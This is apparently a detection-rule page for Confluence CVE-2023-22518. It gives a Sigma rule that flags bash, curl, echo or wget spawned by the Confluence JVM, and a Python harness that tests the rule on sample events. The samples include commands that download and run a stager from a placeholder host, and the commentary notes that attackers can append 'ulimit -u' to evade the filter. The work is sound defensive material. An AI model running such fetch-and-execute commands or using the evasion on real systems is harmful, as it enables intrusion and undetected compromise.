CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
Detects a suspicious child process (bash, curl, echo or wget) spawned by the Confluence Java process on Linux, consistent with post-exploitation of CVE-2023-22518, an improper authorization vulnerability in Confluence Data Center and Confluence Server. An unauthenticated attacker can reach the affected setup/restore endpoints to reset the instance and create an administrator account, and from there execute arbitrary commands on the host.
Sigma rule (View on GitHub)
title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
id: f8987c03-4290-4c96-870f-55e75ee377f4
related:
    - id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db
      type: similar
status: experimental
description: |
    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
references:
    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html
    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment
    - https://github.com/ForceFledgling/CVE-2023-22518
author: Andreas Braathen (mnemonic.io)
date: 2023-11-14
tags:
    - detection.emerging-threats
    - attack.execution
    - attack.t1059
    - attack.initial-access
    - attack.t1190
    - cve.2023-22518
logsource:
    category: process_creation
    product: linux
detection:
    selection_parent:
        ParentImage|endswith: '/java'
        ParentCommandLine|contains: 'confluence'
    selection_child:
        # Only children associated with known campaigns
        Image|endswith:
            - '/bash'
            - '/curl'
            - '/echo'
            - '/wget'
    filter_main_ulimit:
        CommandLine|contains: 'ulimit -u'
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: high
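To see what the rule's selections, filter and condition actually do against telemetry, the following is an added worked example: a small, hypothetical re-implementation of this rule's matching logic in Python, run over constructed process_creation events. It is not Sigma's own engine and not the rule author's code; the event field names follow the Sigma process_creation taxonomy the rule uses, the sample command lines and the host `example.invalid` are placeholders, and, as in Sigma, string comparisons are treated as case-insensitive.

```python
#!/usr/bin/env python3
"""Hypothetical re-implementation of the Sigma rule
'CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)'
applied to JSON-lines process_creation events. Example code, not the rule author's
and not a Sigma backend."""
import json

# selection_child: Image|endswith (only children seen in known campaigns)
SUSPICIOUS_CHILD_SUFFIXES = ("/bash", "/curl", "/echo", "/wget")


def _lc(value):
    # Sigma string modifiers match case-insensitively unless 'cased' is used.
    return (value or "").lower()


def selection_parent(ev):
    # ParentImage|endswith: '/java' AND ParentCommandLine|contains: 'confluence'
    return (_lc(ev.get("ParentImage")).endswith("/java")
            and "confluence" in _lc(ev.get("ParentCommandLine")))


def selection_child(ev):
    return _lc(ev.get("Image")).endswith(SUSPICIOUS_CHILD_SUFFIXES)


def filter_main_ulimit(ev):
    # filter_main_ulimit: CommandLine|contains: 'ulimit -u'
    return "ulimit -u" in _lc(ev.get("CommandLine"))


def rule_matches(ev):
    # condition: all of selection_* and not 1 of filter_main_*
    return selection_parent(ev) and selection_child(ev) and not filter_main_ulimit(ev)


def detect(jsonl):
    """Parse JSON-lines events and return those that fire the rule, in input order."""
    hits = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if rule_matches(ev):
            hits.append(ev)
    return hits


# Constructed sample events (placeholders, not real telemetry).
CONFLUENCE_JAVA = "/opt/atlassian/confluence/jre/bin/java"
CONFLUENCE_CMD = (CONFLUENCE_JAVA + " -Dconfluence.home=/var/atlassian/application-data/confluence"
                  " org.apache.catalina.startup.Bootstrap start")
JENKINS_JAVA = "/usr/lib/jvm/java-17/bin/java"
JENKINS_CMD = JENKINS_JAVA + " -jar /usr/share/jenkins/jenkins.war"

SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    # 1. benign: Confluence's own 'ulimit -u' check, excluded by filter_main_ulimit
    {"Image": "/usr/bin/bash", "CommandLine": "bash -c ulimit -u",
     "ParentImage": CONFLUENCE_JAVA, "ParentCommandLine": CONFLUENCE_CMD},
    # 2. hit: curl pulling a stager from a placeholder host
    {"Image": "/usr/bin/curl", "CommandLine": "curl -s http://example.invalid/stage.sh -o /tmp/stage.sh",
     "ParentImage": CONFLUENCE_JAVA, "ParentCommandLine": CONFLUENCE_CMD},
    # 3. hit: bash executing the downloaded stager
    {"Image": "/usr/bin/bash", "CommandLine": "bash /tmp/stage.sh",
     "ParentImage": CONFLUENCE_JAVA, "ParentCommandLine": CONFLUENCE_CMD},
    # 4. no hit: same child, but the parent JVM is not Confluence
    {"Image": "/usr/bin/curl", "CommandLine": "curl -s http://example.invalid/plugin.hpi",
     "ParentImage": JENKINS_JAVA, "ParentCommandLine": JENKINS_CMD},
    # 5. no hit: child not in the rule's narrow list (a blind spot of this rule)
    {"Image": "/usr/bin/python3", "CommandLine": "python3 -c import os",
     "ParentImage": CONFLUENCE_JAVA, "ParentCommandLine": CONFLUENCE_CMD},
    # 6. hit: mixed case in the parent command line still matches (case-insensitive)
    {"Image": "/usr/bin/wget", "CommandLine": "wget -q http://example.invalid/x -O /tmp/x",
     "ParentImage": CONFLUENCE_JAVA, "ParentCommandLine": CONFLUENCE_CMD.replace("confluence", "CONFLUENCE")},
])


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ALERT:", hit["Image"], "<-", hit["ParentImage"], "|", hit["CommandLine"])
```

Two points the sample run makes visible. Event 5 shows that the child list is deliberately narrow (only binaries seen in the known campaigns), so an interpreter such as python3 or perl spawned by the Confluence JVM goes unreported by this rule; widening the list trades the rule's low false-positive rate for coverage. Event 1 shows why the filter exists, but note that `CommandLine|contains: 'ulimit -u'` is satisfiable by the attacker as well: a command line that merely includes that string anywhere, for example appended after a `;`, is excluded from the detection, so the filter should be kept as tight as the environment allows and this rule paired with the endpoint-connection rules listed below.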
Related rules
- CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
- Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
- Atlassian Confluence CVE-2022-26134
- CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)
- CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)